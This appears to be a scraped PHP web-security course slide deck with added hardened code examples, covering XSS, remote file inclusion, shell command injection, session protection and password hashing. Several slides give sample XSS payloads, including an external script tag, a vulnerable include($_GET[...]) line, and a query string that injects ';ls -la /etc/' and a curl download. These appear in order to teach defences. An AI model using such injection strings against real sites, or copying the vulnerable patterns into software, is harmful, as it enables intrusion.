Security Issues

Post on 21-Dec-2015


Page 1: Security Issues

Page 2: General Considerations

Security is a hot topic.

Security discussions are full of jargon: Zero Day Exploit, Pen testing, Hacker, Pharming, Injection, malware, DOS.

Serious issue, but lots of FUD.

Page 3: Start by thinking about where you are exposed

Page 4: Filesystem

Multiuser systems: PHP code executes as the web server, with the web server's permissions.

This means any file that you write via PHP might be writable by other users (either via PHP or a CGI program).

Any file that's readable by the web server is readable by others via the web server, even if the server won't serve them to a browser directly.

Often web pages are world readable.

Page 5: Forms

You're also exposed whenever you request data from a user. A user may give you data you don't expect or want.

Depending on how your program handles the data, this can have a variety of results:

Your data on the server could be affected.

Other users' browsers could be affected.

Page 6: Other Vectors

This is an aside…

Services such as ssh and mysql: firewalls, DMZ, bind to different IP addresses.

What you do from the server.

Where the server is located--physical security is key.

Page 7: Consider where you want to put your security measures

For example, in this class I'm trusting you all a lot, as a group, not to trash machines.

In MySQL, you can either use the database to secure data, or PHP, or both. Both is hard to do…

In some cases, restricting access to a domain is enough; in others, ids are better.

Page 8: Balance

Security is like a seesaw, with whitehats and blackhats on the ends.

What's the most secure OS? Where is the threat coming from these days?

Page 9: Categories of Hacks

Data that is inserted into code that is displayed on your pages.

Data that is inserted to alter your data.

Holes that can be exploited to run arbitrary commands.

Page 10: Display Hacks

Targets are bulletin boards, blogs that allow comments, wikis, web forums--anything that allows users to input text that will be displayed.

At best, you might get random stuff showing up on your web pages.

At worst, users could be "captured" and whisked away.

Page 11: Builtin Security

PHP does try to protect us, but sometimes that protection causes its own problems.

I'm going to run through a series of examples, showing some simple insertion techniques, and the approaches to stop them.

Page 12: Magic Quotes

An example of trying to do good in a bad way…

Page 13: In the Beginning

As PHP became more popular, attacks against it became more common (why would this be the case?).

Around PHP 3, it was in widespread use, but had very few security features out of the box.

In particular, it did nothing to affect data input by forms.

Page 14: Version 4.2.3

To make PHP safer, version 4.2.3 included magic quotes enabled by default.

Magic quotes performs the same function as addslashes(), but only on GET, POST or cookie data--that is, it escapes any ', ", \, or NULL characters, in an attempt to prevent folks from inserting command strings into PHP.

It works ok, for what it's trying to do, but isn't a complete solution…

Page 15: So how does it work?

Magic quotes will try to protect us a bit if someone inserts something like:

<b>Alert!</b><p>Your account has been compromised, please <a href="http://www.cs.unc.edu">click here for further information</a></p>

Page 16: echo_string_noslash.php

This file defeats magic quotes and echoes the $_GET["string"] var without alteration:

<b>Alert!</b><p>Your account has been compromised, please <a href="http://www.cs.unc.edu">click here for further information</a></p>

Page 17: Calgon, take me away

One can also insert code that moves the user from your site:

<script type=text/javascript>window.location = "http://www.duke.edu";</script>

Page 18: With magic quotes

echo_string.php doesn't defeat magic quotes.

Page 19: Can't trust browsers anyhow

So with magic quotes, if the hacker uses well formed HTML, we're ok. But what if I put this in:

<b>Alert!</b><p>Your account has been compromised, please <a href=http://www.cs.unc.edu>click here for further information</a></p>

Or this:

<img src=http://cutedeadthings.com/images/skull-pink-tm.png>

The browser is trying to be helpful… Look at the source.

Page 20: We don't need no quotes

Even worse, we don't need quotes to call for an external javascript.

This means we can insert pretty much anything we want into the page:

<script src=http://127.0.0.1/INLS672/samples/php/security/javascript_hack.js></script>

Page 21: This last example

Cross site scripting (XSS) generally involves getting data into a web form that produces HTML for display, and using that to call an external script to perform a malicious action.

This is often done with javascript, but can be done with other languages.

Older versions of IE were prone to attack in this manner because of ActiveX.

Page 22: Are Magic Quotes AGT?

Some say that magic quotes are bad:

When enabled, it can make it more difficult to get the data the way you want it.

Produces a false sense of security, since programmers should check user data anyway.

But it does protect against the most common attacks such as insertion of javascript.

But folks hated it enough that it's off in PHP 6.

And that's the worst of it--if you want to write portable code, you have to check for it.

Page 23: Detecting and Defeating Magic Quotes

This is not very efficient:

<?php
if (get_magic_quotes_gpc()) {
    // Recursively undo the backslashes magic quotes added to GET/POST/cookie data
    function stripslashes_deep($value) {
        $value = is_array($value) ?
                    array_map('stripslashes_deep', $value) :
                    stripslashes($value);
        return $value;
    }

    $_POST    = array_map('stripslashes_deep', $_POST);
    $_GET     = array_map('stripslashes_deep', $_GET);
    $_COOKIE  = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
?>

from http://us.php.net/manual/en/function.stripslashes.php

Page 24: It's up to you

For many samples of XSS attacks, see: http://ha.ckers.org/xss.html

Page 25: Simple Sanitation

In this case, we're going to use htmlentities(), htmlspecialchars() and strip_tags() to affect the user's input.

See echo_string_checks.html. Be aware that this is mainly a browser protection…

Page 26: Blacklist vs. Whitelist

What we've looked at so far are examples of blacklisting--trying to spot evil input.

Whitelisting is more secure--figure out what you want, and only allow that.

Page 27: Using regex

Decide what you're willing to accept. Check the user input for that.

// eregi() was removed in PHP 7; preg_match() with the /i modifier performs the same test.
// The pattern allows only letters and digits; {0,} means zero or more of them.
if (preg_match("/^[a-zA-Z0-9]{0,}$/i", $_GET['string'])) {
    echo "String is: " . $_GET['string'];
} else {
    echo "<p>Illegal characters detected</p>";
}

Page 28: echo_string_clean.html

This is the same form, but passes data to a php script with the regex code.

This approach has advantages:

Futureproof.

Doesn't require you to guess what the hacker might try.

On error, doesn't process the data at all.

Downside is it's harder to get data through.
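The whitelist check of pages 27-28 and the output sanitation of page 25, combined in one added example (this is not code from the slides or from echo_string_clean.html). Function names and the sample inputs are constructed here; the inputs include the slides' own HTML and script payloads next to a benign value. Whitelisting decides what gets processed; HTML-escaping on output is the fallback for anything that has to be displayed anyway.

```php
<?php
// Added example (not from the slides): whitelist validation of a form field,
// plus HTML-escaping on output for anything that is allowed through.
// Function names and the sample inputs below are constructed for this demo.

// Whitelist: accept only ASCII letters and digits, 1..40 characters.
// \A and \z anchor to the absolute start and end of the string; a plain $
// would still match just before a trailing newline.
function is_allowed_string(string $input): bool
{
    return preg_match('/\A[A-Za-z0-9]{1,40}\z/', $input) === 1;
}

// Output encoding: whatever reaches the page is rendered as text, never as markup.
// ENT_QUOTES escapes both ' and " so the value is also safe inside attribute values.
function render_safe(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: the slides' HTML/JS payloads next to benign values.
$samples = [
    'hello42',
    "hello42\n",   // rejected: \z does not tolerate the trailing newline that $ would
    '<b>Alert!</b><p>Your account has been compromised</p>',
    '<script type=text/javascript>window.location = "http://www.duke.edu";</script>',
    '<img src=http://cutedeadthings.com/images/skull-pink-tm.png>',
];

foreach ($samples as $s) {
    if (is_allowed_string($s)) {
        echo "ACCEPTED : String is: " . $s . "\n";
    } else {
        // Refused by the whitelist; if it had to be shown anyway (e.g. a comment
        // field where markup is expected as text), encode it on output.
        echo "REJECTED : " . render_safe($s) . "\n";
    }
}
```

Run it from the command line with `php whitelist_demo.php`; only `hello42` is accepted, and every rejected payload is printed with `<`, `>` and quotes turned into entities, so a browser would show the markup rather than interpret it. Note that strip_tags() is a blacklist by nature (it removes what it recognises), which is why the whitelist runs first.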

Page 29: Arbitrary Commands

Basically, this is the worst kind of attack.

Cracker finds a hole that allows a command to be executed.

Most often that happens at the privilege level of the web server.

In some cases, it can be an elevated privilege (rare on linux, not so rare on windows under pre-vista installations).

Page 30: Includes and Requires

It's pretty common to use an include or require to pull files into a core script.

This is a potential vector for a XSS attack, since PHP doesn't care if the file included is remote or local.

Be careful with these--if you pass the file to be included into your script with a GET or POST, a hacker can run a script of their own through yours.

magic_quotes do not protect against this. It's one of the ways I've been hacked.

include $_GET['file'];

Page 31: How I've Been Hacked

I created a simple PHP file that included other files with a GET reference.

This allowed me to call files elsewhere on the server inside my frame program, and control the display if the file were a text file or html.

I did not check the data being passed.

The hacker passed a reference to a file on their system, that ran a perl script creating an email relay on our web server, and then passed email through the web server to our smtp server, which accepted all of the spam, since it came from within cs.unc.edu.

Page 32: The File

http://wwwx.cs.unc.edu/help/network/frame.php?

The problem line was:

include($_GET[name]);

Page 33: The Fix

Changed include() to readfile(); the latter doesn't process code, just reads it to output.

Added a check for "//" for remote access urls.

Added a hook to send email to me when tapped.
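An added example (not the author's frame.php fix) of what a frame-style page can do instead of include($_GET[name]): the request is treated as a bare page name, resolved inside one fixed directory, and served with readfile(). The "//" check from the slides stops remote URLs but not "../" traversal or a local .php file, so the check here whitelists the name's shape and confirms the canonical path with realpath(). $docs_dir, the two page files and the sample requests are constructed so the script runs offline.

```php
<?php
// Added example (not the author's frame.php): serve a page chosen by a GET
// parameter without include() and without trusting the parameter as a path.
// $docs_dir, the file names and the sample requests are constructed here so the
// script runs offline; in a real deployment $docs_dir is a fixed directory
// outside the web root.

// Build a throwaway documents directory with two legitimate pages.
$docs_dir = sys_get_temp_dir() . '/frame_demo_' . bin2hex(random_bytes(4));
mkdir($docs_dir);
file_put_contents("$docs_dir/intro.html", "<h1>Intro</h1>\n");
file_put_contents("$docs_dir/faq.html",   "<h1>FAQ</h1>\n");

// Return the real path of the requested page, or null if the request must be refused.
// Checks, in order: (1) the name is a plain file name (no slashes, no "..", no URL,
// .html only), (2) the file exists, (3) its canonical path is still inside $docs_dir.
function resolve_page(string $docs_dir, string $name): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.html\z/', $name) !== 1) {
        return null;                       // rejects "//host/x", "../x", "x.php", ""
    }
    $real_dir  = realpath($docs_dir);
    $real_path = realpath($docs_dir . '/' . $name);
    if ($real_dir === false || $real_path === false) {
        return null;                       // does not exist (or symlink target vanished)
    }
    // Prefix check guards against a symlink inside $docs_dir pointing elsewhere.
    if (strncmp($real_path, $real_dir . DIRECTORY_SEPARATOR, strlen($real_dir) + 1) !== 0) {
        return null;
    }
    return $real_path;
}

// Constructed requests: two legitimate, three hostile (remote URL, traversal, code).
$requests = ['intro.html', 'faq.html', 'http://attacker.invalid/x.txt', '../../etc/passwd', 'shell.php'];

foreach ($requests as $name) {
    $path = resolve_page($docs_dir, $name);
    if ($path === null) {
        // The slides' "send me email when tapped" hook would go here; logging is the minimum.
        error_log("refused frame request: " . $name);
        echo "REFUSED  $name\n";
        continue;
    }
    // readfile() copies bytes to output; nothing in the file is executed as PHP.
    echo "SERVING  $name: ";
    readfile($path);
}

// Clean up the demo directory.
array_map('unlink', glob("$docs_dir/*"));
rmdir($docs_dir);
```

Two design points: the whitelist on the name's shape is what makes the later realpath() comparison meaningful (a name that never contains a separator cannot escape the directory), and readfile() is kept even for the accepted names, since allow_url_fopen and include() together are exactly the combination that turned the original frame.php into a remote code loader.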

Page 34: Attacking the server

Since PHP can pull data about the server, it can be used to find out about the server's configuration (esp. the web server).

More dangerous is the ability to access the shell. You should be careful with any data that will be passed to a shell script with backticks, exec(), or shell_exec().

Page 35: Unguarded GET or POST

In this case, the GET variable is passed directly into a shell exec.

We know that shell script lines are terminated in a ";".

So a command can be passed in the variable, by inserting a semicolon.

This example from http://www.sitepoint.com/article/php-security-blunders

$month = $_GET['month'];
$year  = $_GET['year'];

// Vulnerable as written: both values are interpolated into the command line unchecked
exec("cal $month $year", $result);
print "<PRE>";
foreach ($result as $r) {
    print "$r<BR>";
}
print "</PRE>";

Page 36: Unguarded GET or POST

An example of a get URL:

http://127.0.0.1/php/security/unguarded_get.php?month=9;ls -la /etc/

This would be passed to the web server, and executed with its permissions, so it's a better vector for reads than writes.

But any directory that the web server could write to could be tapped…

This example from http://www.sitepoint.com/article/php-security-blunders

Page 37: Unguarded GET or POST

Ok, so let's say this file sits in a directory that the web server can write to (say for a user comment file, or a log, or…).

Then a hacker could pass something more malicious, eg:

curl http://www.cs.unc.edu -o myfile.php

Page 38: Unguarded GET or POST

The author recommends using a regular expression to check that the input is solely numbers, and of the correct length.

This example from http://www.sitepoint.com/article/php-security-blunders

$month = $_GET['month'];
$year  = $_GET['year'];

if (!preg_match("/^[0-9]{1,2}$/", $month)) {
    die("Bad month, please re-enter.");
}
if (!preg_match("/^[0-9]{4}$/", $year)) {
    die("Bad year, please re-enter.");
}
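The check from page 38, carried one step further as an added example (not the SitePoint article's code): the fields are whitelisted as digits of the right length, range-checked, and then quoted with escapeshellarg() before they get anywhere near exec(). The function build_cal_command() and the sample requests are constructed for the demo; the command string is returned and printed rather than executed, so the script runs anywhere. Two details a practitioner would want: in PCRE the `$` anchor also matches just before a trailing newline, so `\z` is used instead, and "digits only" is not the same as "valid month".

```php
<?php
// Added example (not from the slides or the SitePoint article): validating the
// month/year fields before they reach exec(), and quoting them on top of that.
// build_cal_command() and the sample inputs are constructed for this demo.

// Return the exact command line that would be run, or null if either field is
// refused. Two layers:
//  1. whitelist the format (digits only, correct length). \z is used instead of $
//     because in PCRE "$" also matches just before a trailing "\n".
//  2. escapeshellarg() wraps each argument in single quotes, so even if the
//     whitelist were loosened later, ";" or "&&" could not start a new command.
function build_cal_command(string $month, string $year): ?string
{
    if (preg_match('/\A[0-9]{1,2}\z/', $month) !== 1) {
        return null;                            // "Bad month"
    }
    if (preg_match('/\A[0-9]{4}\z/', $year) !== 1) {
        return null;                            // "Bad year"
    }
    $m = (int) $month;
    if ($m < 1 || $m > 12) {
        return null;                            // digits-only is not the same as valid
    }
    return 'cal ' . escapeshellarg($month) . ' ' . escapeshellarg($year);
}

// Constructed requests, including the slides' injected "ls", the "curl" payload,
// and a trailing newline that a "$"-anchored regex would have let through.
$requests = [
    ['month' => '9',              'year' => '2015'],
    ['month' => '9;ls -la /etc/', 'year' => '2015'],
    ['month' => "9\n",            'year' => '2015'],
    ['month' => '13',             'year' => '2015'],
    ['month' => '9',              'year' => '2015; curl http://www.cs.unc.edu -o myfile.php'],
];

foreach ($requests as $r) {
    $cmd = build_cal_command($r['month'], $r['year']);
    if ($cmd === null) {
        echo "REFUSED   month=" . json_encode($r['month']) . " year=" . json_encode($r['year']) . "\n";
        continue;
    }
    echo "WOULD RUN: $cmd\n";       // cal '9' '2015'
    // exec($cmd, $result);         // only ever reached with validated, quoted input
}
```

Only the first request survives; the output line for it shows the quoted form `cal '9' '2015'`, which is what the shell would receive even if a future edit relaxed the regex.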

Page 39: 06_mysql_submit.php

I'm pretty much a failure hacking MySQL so far…

But using the lab as an example, here are some things you can insert into the db:

<a href=\"http://www.cs.unc.edu\">Wonk</a>

<img src=/PoweredByMacOSXLarge.gif>

It's restricted by the number of characters allowed in the field, but you get the idea.

Page 40: Additional Considerations for MySQL

Don't use unrestricted privileges for database connections (do as I say, not as I do).

Either have the user supply a user id and password, or use a restricted account.

Use a mysql account that is limited and appropriate for the given task.

Page 41: General Server Settings

Page 42: register_globals

register_globals, when on, allows php full access to all variables directly.

In my examples, I've accessed GET and POST data via the server global array even when not necessary.

With it on, $_GET["variable"] is the same as $variable in php.

This gives a hacker a chance to inject data into unprotected variables in your script, say into a session variable.

So check to see that it's off.

Page 43: open_basedir

The default is to allow php to open any files; this setting can be enabled to restrict what directories php can access.

With a setting of ".", the tree is restricted to the folder of the script itself, or lower.

Can be set for virtual servers in apache.

Keep in mind that this setting only affects php; any shell scripts you use have full run of the directory tree.
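An added example covering pages 42 and 43 (it is not code from the slides): a short ini audit that reports the settings discussed here, and the coding habit that makes register_globals harmless even when it is on. audit_settings() and is_authorised() are constructed for the demo; every directive name queried is a real PHP ini setting (register_globals and magic_quotes_gpc were removed in PHP 5.4, so on a current build ini_get() returns false for them and the audit stays quiet). The expected password is a constructed value and stands in for whatever the application checks against.

```php
<?php
// Added example (not from the slides): a small php.ini audit plus the coding habit
// that makes register_globals harmless. audit_settings() and is_authorised() are
// constructed for this demo; every directive name is a real PHP ini setting.

// Returns a list of findings; an empty list means nothing was flagged.
function audit_settings(): array
{
    $findings = [];

    // register_globals: removed in PHP 5.4; on older builds it must be off.
    if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'register_globals is on: request parameters become PHP variables';
    }
    // magic_quotes_gpc: removed in PHP 5.4; portable code has to check for it anyway.
    if (filter_var(ini_get('magic_quotes_gpc'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'magic_quotes_gpc is on: input arrives pre-escaped with backslashes';
    }
    // open_basedir: empty means PHP may open any file the web server user can read.
    if (trim((string) ini_get('open_basedir')) === '') {
        $findings[] = 'open_basedir is empty: PHP can read anywhere the server user can';
    }
    // allow_url_include: lets include()/require() fetch code from a URL.
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_include is on: include($_GET[...]) can pull remote code';
    }
    return $findings;
}

// The habit: initialise every variable before use. With register_globals on,
// an uninitialised $authorised could be pre-set from ?authorised=1 in the URL;
// assigning a default first means the request can no longer supply it.
function is_authorised(array $post, string $expected_password): bool
{
    $authorised = false;                       // explicit default, never inherited
    $password   = $post['password'] ?? '';
    if (hash_equals($expected_password, $password)) {
        $authorised = true;
    }
    return $authorised;
}

foreach (audit_settings() as $f) {
    echo "WARN  $f\n";
}

// Constructed form submissions (the second mimics a request that tries to set the flag).
var_dump(is_authorised(['password' => 'letmein'], 'letmein'));   // bool(true)
var_dump(is_authorised(['authorised' => '1'], 'letmein'));       // bool(false)
```

Run it under the web server's own PHP (for example through a one-line page, or `php -c /path/to/php.ini audit.php`) rather than the CLI defaults, since the CLI often reads a different php.ini than mod_php or php-fpm does.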

Page 44: What can you do?

(Panic?)

Page 45: Protect your code

In the class pages, I've made the source code visible over the web. This is something to avoid in general--it's easier to hack a site if you know the source.

Hide configuration files and data:

Restrictive .htaccess files.

Use cron based shell scripts to whisk data away.

Keep data and config files separate from scripts.

Use a sealed db server.

Page 46: Hiding files

Files with a "." as the first character are readable by PHP, but won't be served by a web server.

Depending on the server configuration (such as the web server's FollowSymLinks setting, or PHP's open_basedir setting), you may be able to store data files in areas that the web server won't serve up.

Page 47: .htaccess files

Disallow directory listings. You can also use a blank index file.

Restrict access by user id or by domain.

See http://www.htaccessbasics.com/

Page 48: Directory Structures

Keep data files in one directory, configuration files in another, and scripts in a third.

You may need to put the data and config dirs inside the scripts folder, but you can use an .htaccess file or other methods to control access.

For example, write permissions or afs acls.

Page 49: Open versus Sealed servers

Be aware of who else is on your server.

Remember that the web server has to have read privileges--if I'm on the same server, I might be able to use a cgi to see your source code.

Consider a "sealed" server for critical data.

Page 50:

Finding Hacks

Run a hash on your scripts to check for mods--there are lots of freebie programs that can do this for you and alert you to changes

Tripwire is one example, but it's a complicated thing

Watcher

Page 51:

Keep Cookies in the jar

PHP sessions can store data in cookies as well as server side--best not to do this unless the data's not sensitive

Page 52:

Keep Cookies in the jar

Some browsers (IE, for example) have historically been prone to cookie theft

So if you store sensitive data in a cookie, salt and encrypt it (a hash is always better with a salt anyway)

Page 53:

Control Session Data

In the examples for class, I've used a session to store data across forms

Session data is usually in /tmp or /var/tmp

Since the web server can read these, so can anyone else on the server who can write web scripts

Page 54:

Protecting Session Data

To reduce the chance of hijacking, use a combination of data--for example, check not only the session key, but also the IP number (consider storing that in post data or a text file)

Encrypt any sensitive data stored in the session

cookie_monster.php

Page 55:

Better Still

Generate a random key on each page load

Check other data, such as the client IP number or browser version, and track that as well

Store data in multiple places and compare (e.g. some data in the session, some in a cookie, and even some in a database or file)
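The three suggestions on slides 54 and 55 put together as one PHP start-up routine. This is an added example, not the deck's cookie_monster.php: the session id is rotated on every page load, the session is bound to a hash of the client IP and User-Agent, and a second copy of that binding is kept in a cookie and compared against the server-side session file. Function and cookie names are my own.

```php
<?php
// Added example, not from the slides. Hardened session start-up.

function client_fingerprint(array $server): string
{
    // Hashed, so the raw IP / User-Agent never sit in the session file in /tmp.
    return hash('sha256', ($server['REMOTE_ADDR'] ?? '') . '|' . ($server['HTTP_USER_AGENT'] ?? ''));
}

// Returns true when an existing session passed all checks, false when the
// session is brand new or was thrown away because a check failed.
function secure_session_start(array $server, array $cookie): bool
{
    session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
    session_start();
    $fp = client_fingerprint($server);
    $cookie_fp = is_string($cookie['fp'] ?? null) ? $cookie['fp'] : '';
    $fresh = !isset($_SESSION['fp']);
    $ok = $fresh
        // server-side copy must match what this client looks like now...
        || (hash_equals($_SESSION['fp'], $fp)
        // ...and the copy in the cookie must match the server-side copy
        && hash_equals($_SESSION['fp'], $cookie_fp));
    if (!$ok) {
        // Mismatch: treat as a possible hijack and drop the whole session.
        session_unset();
        session_destroy();
        session_start();
    }
    $_SESSION['fp'] = $fp;
    setcookie('fp', $fp, ['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
    // "Generate a random key on each page load": new id, old id deleted.
    session_regenerate_id(true);
    return $ok && !$fresh;
}

$trusted = secure_session_start($_SERVER, $_COOKIE);
if (!$trusted) {
    // New or reset session: whatever login state was there is gone.
    unset($_SESSION['user']);
}
```

Binding to the IP will log out users whose address changes mid-session (mobile clients, some proxies), so weigh that against the hijacking risk for your site.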

Page 56:

Hash is good for you

I've mentioned this a few times, but you can use hashes of data as a security measure, esp. for passwords

What is hash really?

Page 57:

createLogin

This is some code I used for a faculty application site

Users created a login with their email address as an id

Passwords stored in a text file, as an MD5 hash

Page 58:

create_login.php

This is a simple PHP script that calls some HTML into itself, and uses a jah-like function to test the data submitted by the user--this check has a PHP backend, so the javascript check and the subsequent PHP check are the same

All it does for the password is run it through md5

Page 59:

    // Array keys quoted (bare id, passwd, ... would be undefined constants)
    $new_entry['id'] = trim($_POST["get_id"]);
    $new_entry['passwd'] = md5(trim($_POST["get_passwd"]));  // unsalted MD5 of the password
    $new_entry['key'] = $_SESSION['session_key'];
    $new_entry['created'] = $runtime;
    $new_entry['status'] = "new";
    write_data_file($new_entry, $id_data);

create_login.php

As the form is submitted to itself, after some checks, the post data is shoved into an array, and written to a file

The hash would be better with a salt

Page 60:

submit_application.php

After the id is created, or when a user returns, they land on submit_application.php

This asks them for the userid and password on the first pass

On the second pass, it checks the userid and data in the post

Page 61:

    $ids_file = read_data_file("./config/userids.txt");
    $test = md5_match_array_element($ids_file, "id", $_POST["id"], "passwd", $_POST["passwd"]);
    if ($test > 0) {
        $action = "submit_application: login_failure";
        require './logger.php';  // call the program to write out log entries.
        die_cleanly("<div id=\"notice\"><p>Invalid User ID or password, if you feel you have received this message in error please contact <a href=\"http://www.cs.unc.edu/cgi-bin/mailcs?hays\"> bil hays</a></p></div>");
    }

submit_application.php Notice md5_match_array_element()

Page 62:

md5_match_array_element()

    // Returns "0" if the id is found and the password hash matches,
    // "1" if the id is found but the hash differs, "2" if the id is not found
    function md5_match_array_element($array, $array_key, $get_key, $array_element, $get_element)
    {
        foreach ($array as $i)
        {
            if ($i[$array_key] == $get_key)
            {
                if ($i[$array_element] != md5($get_element))
                {
                    return "1";
                }
                return "0";
            }
        }
        return "2";
    }
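The "better with a salt" point from slide 59 and the lookup on slide 62, reworked as an added example that is not the deck's code: the same record layout and the same "0 / 1 / 2" return codes, but the password goes through password_hash() (salted bcrypt) and is checked with password_verify(). The sample logins are constructed; read_data_file() is replaced by an inline array.

```php
<?php
// Added example, not the deck's create_login.php / md5_match_array_element().

function make_login(string $id, string $passwd, string $session_key): array
{
    return [
        'id'      => $id,
        // password_hash() draws a random salt and embeds it in the result, so
        // two users with the same password get different stored values.
        'passwd'  => password_hash($passwd, PASSWORD_DEFAULT),
        'key'     => $session_key,
        'created' => time(),
        'status'  => 'new',
    ];
}

// Drop-in replacement for md5_match_array_element(): "0" = id and password
// match, "1" = id found but password wrong, "2" = id not found.
function hash_match_array_element(array $array, string $array_key, string $get_key,
                                  string $array_element, string $get_element): string
{
    foreach ($array as $i) {
        // === rather than ==: PHP's loose comparison treats "1e3" == "1000" as true.
        if ((string) $i[$array_key] === $get_key) {
            // password_verify() reads salt and cost out of the stored hash and
            // compares in constant time, so no md5() call on the submitted value.
            return password_verify($get_element, $i[$array_element]) ? "0" : "1";
        }
    }
    return "2";
}

// Constructed sample standing in for read_data_file("./config/userids.txt").
$ids = [
    make_login('alice@example.edu', 'correct horse', 'k1'),
    make_login('bob@example.edu',   'correct horse', 'k2'),
];
// Same password, different salts: the stored hashes differ.
var_dump($ids[0]['passwd'] !== $ids[1]['passwd']);
foreach ([['alice@example.edu', 'correct horse'],
          ['alice@example.edu', 'wrong'],
          ['eve@example.edu',   'whatever']] as [$id, $pw]) {
    echo $id, ' -> ', hash_match_array_element($ids, 'id', $id, 'passwd', $pw), "\n";
}
```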

Page 63:

Use of hashes

A hash can be used to check a value presented against a prior value

Or to detect file changes--if you write a big chunk of code, you can run a hash on the files or the tarball. When you check the files against the hash, you can detect a change
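The "run a hash on your scripts" idea from slide 50 and the file-change detection described here, as an added example rather than any tool the deck names: a small PHP script that records a SHA-256 baseline of every .php file under a directory and, on later runs, reports files that were added, removed or changed. The script name, baseline file name and command-line modes are my own.

```php
<?php
// Added example, not from the slides: minimal script-integrity check.
// Usage:  php integrity.php init  /var/www/site   (record baseline)
//         php integrity.php check /var/www/site   (report differences; cron this)

function hash_tree(string $dir, array $exts = ['php']): array
{
    $hashes = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!in_array(strtolower($file->getExtension()), $exts, true)) {
            continue;
        }
        $rel = substr($file->getPathname(), strlen($dir) + 1);
        $hashes[$rel] = hash_file('sha256', $file->getPathname());
    }
    ksort($hashes);
    return $hashes;
}

function compare_baseline(array $baseline, array $current): array
{
    $report = ['added' => [], 'removed' => [], 'changed' => []];
    foreach ($current as $path => $h) {
        if (!isset($baseline[$path])) {
            $report['added'][] = $path;
        } elseif (!hash_equals($baseline[$path], $h)) {
            $report['changed'][] = $path;
        }
    }
    foreach (array_keys($baseline) as $path) {
        if (!isset($current[$path])) {
            $report['removed'][] = $path;
        }
    }
    return $report;
}

[$mode, $dir] = [$argv[1] ?? 'check', rtrim($argv[2] ?? '.', '/')];
// Keep the baseline outside the web root and not writable by the web server,
// or whoever modifies a script can simply update the baseline too.
$baselineFile = __DIR__ . '/baseline.json';
if ($mode === 'init') {
    file_put_contents($baselineFile, json_encode(hash_tree($dir), JSON_PRETTY_PRINT));
    exit(0);
}
$baseline = json_decode((string) file_get_contents($baselineFile), true) ?? [];
$report = compare_baseline($baseline, hash_tree($dir));
foreach ($report as $kind => $paths) {
    foreach ($paths as $p) {
        echo "$kind\t$p\n";
    }
}
exit(array_sum(array_map('count', $report)) > 0 ? 1 : 0);
```

The non-zero exit status on any difference is what lets a cron job mail you an alert.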

Page 64:

Final points

Page 65:

Keep Up To Date

Update your PHP installation regularly, and check the php.ini settings when you do

Create and check log files in your PHP programs (consider automating this with a cron)

Read--there are web sites and discussion lists that cover these issues--many are a bit histrionic, but you get good ideas anyway

Page 66:

http://nexodyne.com/

http://www.codehelp.co.uk/php/taint.php